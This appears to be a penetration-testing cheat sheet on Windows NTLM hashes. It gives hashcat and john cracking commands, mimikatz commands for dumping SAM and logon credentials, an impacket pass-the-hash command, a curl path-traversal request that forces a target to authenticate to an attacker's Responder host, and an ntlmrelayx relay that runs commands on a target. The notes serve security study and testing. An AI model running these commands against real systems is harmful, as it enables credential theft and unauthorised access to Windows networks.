NTLM Hashes

Introduction

Windows stores hashed user passwords in the Security Account Manager (SAM) database file or at NTDS.DIT data base which is located at the Domain Controllers. Important thing to note that the hashes stored are not salted.

There are multiple versions of hashes that used to store passwords in windows.

LM

LM hash is the most traditional way to store passwords in windows but it's considered weak and not enough. also, It’s disabled by default since windows vista/windows server 2008.

Cracking LM hash:

john --format=lm hash.txt
hashcat -m 3000 -a 3 hash.txt

NTHash

On modern systems, the hashes are stored as NTHash hashes a.k.a NTLM.

Cracking NTHashes

john --format=nt hash.txt
hashcat -m 1000 -a 3 hash.txt

NTLMv1

The NTLMv1 A.K.A. Net-NTLMv1 protocol uses the NTHash in a challenge/response between a server and a client.

Cracking NTLMv1 hash:

john --format=netntlm hash.txt
hashcat -m 5500 -a 3 hash.txt

NTLMv2

NTLMv2 A.K.A. Net-NTLMv2 is the new and improved version of the NTLMv1 protocol, which makes it a bit harder to crack.

Cracking NTLMv2 hash:

john --format=netntlm hash.txt
hashcat -m 5600 -a 3 hash.txt

Mimikatz

mimikatz is a well known tool to extract passwords and hashes in windows environments.

NOTE: We can only extract SAM database if we are running Mimikatz as Administrator (or higher) and have the SeDebugPrivilege

We can also elevate our privileges to the SYSTEM account with tools like PsExec11 or the built-in Mimikatz token elevation to obtain the required privileges.

It is possible to obtain the required privileges using PsExec or token elevation using mimkatz.

First steps

Running mimikatz and checking basic priviliges:

.\mimikatz.exe
privilege::debug

Elevating to the required privileges

token::elevate

Commands

Extract plaintext passwords and password hashes from all available sources

sekurlsa::logonpasswords 

Extract the hashes from the SAM.

lsadump::sam 

Pass The hash

NOTE: In order to perform pass-the-hash a local Administrator is required unless the target machine is misconfigured.

Passing the hash using psexec from impacket:

impacket-psexec -hashes :<NTHash> <username>@<target>

Capture Net-NTLMv2

Responder

Responder is a tool which able to start a server running various services. The Responder server handles the authentication process and prints all captured credentials and hashes. It supports HTTP, FTP, SMB as well poisoning capabilities for LLMNR, NBT_NS and MDNS.

---

Basic scenario for capturing NTLMv2 using vulnerable web application:

running responder

sudo responder -I <interface>

assuming web is vulnerable to path traversal and using smb shares to display pages:

curl --path-as-is  'http://<targer>/\\<attacker_responder_ip>/a'

The vulnerable website will then authenticate with the responder server and the hashes will be captured.

Relaying Net-NTLMv2

NOTE: In order to perform pass-the-hash a local Administrator is required unless the target machine is have UAC remote restrictions disabled. Also, smb signing needs to be disable.

In a scenario that NTLM is too hard to crack, it possible to relay the net-NTLM authentication hash to the service server.

In order to perform this attack, the tool ntlmrelayx by impacket scripts is used. Starting the ntlmrelayx server which will capture the Net-NTLM hash and relay it to the target machine:

impacket-ntlmrelayx --no-http-server -smb2support -t <target> -c "<command>"

References

NTLM Relayhackndo

NTLM Relay - hackndo

GitHub - SpiderLabs/Responder: Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.GitHub

responder

GitHub - ParrotSec/mimikatzGitHub

mimkatz

LM, NTLM, Net-NTLMv2, oh my!Medium

LM, NTLM, Net-NTLMv2, oh my!